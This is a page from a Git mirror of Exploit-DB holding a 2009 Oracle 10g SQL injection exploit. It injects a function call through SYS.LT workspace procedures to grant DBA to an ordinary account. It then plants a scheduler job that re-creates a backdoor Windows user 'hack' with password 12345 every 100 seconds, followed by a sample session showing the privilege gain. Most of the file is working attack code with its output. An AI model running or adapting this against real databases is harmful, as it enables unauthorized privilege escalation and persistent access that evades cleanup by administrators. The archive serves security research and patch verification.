bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/7677.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

132 lines
No EOL
4 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

/*********************************************************/
/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/
/**grant DBA and create new OS user (using scheduller)***/
/*********************************************************/
/***********exploit grant DBA to scott********************/
/***********and execute OS command "net user"*************/
/***********using scheduler*******************************/
/*********************************************************/
/***********tested on oracle 10.1.0.5.0*******************/
/*********************************************************/
/*********************************************************/
/* Date of Public EXPLOIT: January 6, 2009 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsecrg.ru */
/* http://www.dsec.ru */
/*********************************************************/
/*Original Advisory: */
/*Esteban Martinez Fayo [Team SHATTER ] */
/*Date of Public Advisory: November 11, 2008 */
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
/*********************************************************/
select * from user_role_privs;
CREATE OR REPLACE FUNCTION Z return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT';
EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT';
COMMIT;
RETURN 'Z';
END;
/
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z');
exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z');
/* We create backdored OS user "hack" with password 12345 using External Job's */
/* Note that in this method new user will be created every 100 seconds */
/* so if administrator find it and will try to delete it */
/* user hack will be created again. So it is also a simle backdoor */
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name=> 'MyCmd',
program_type=> 'EXECUTABLE',
program_action =>Âcmd /c "net user hack 12345 /add"Â’,
enabled=> TRUE);
END;
/
BEGIN
DBMS_SCHEDULER.CREATE_JOB (
job_name=> 'extjobexec',
program_name=> 'MyCmd',
repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100',
enabled=> TRUE,
comments=> 'create backdoor user every 100 seconds');
END;
/
/* here we can paste any OS command for example create new user */
exec dbms_scheduler.run_job('extjobexec');
/
select * from user_role_privs;
---------------------------------------------------------------------------------
-----------------------------EXAMPLE OF EXPLOITATION ----------------------------
---------------------------------------------------------------------------------
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN RESOURCE NO YES NO
SQL> CREATE OR REPLACE FUNCTION X return varchar2
2 authid current_user as
3 pragma autonomous_transaction;
4 BEGIN
5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN';
6 COMMIT;
7 RETURN 'x';
8 END;
9 /
Function created.
SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN DBA NO YES NO
OUTLN RESOURCE NO YES NO
SQL>
// milw0rm.com [2009-01-06]
Reference in a new issue View git blame Copy permalink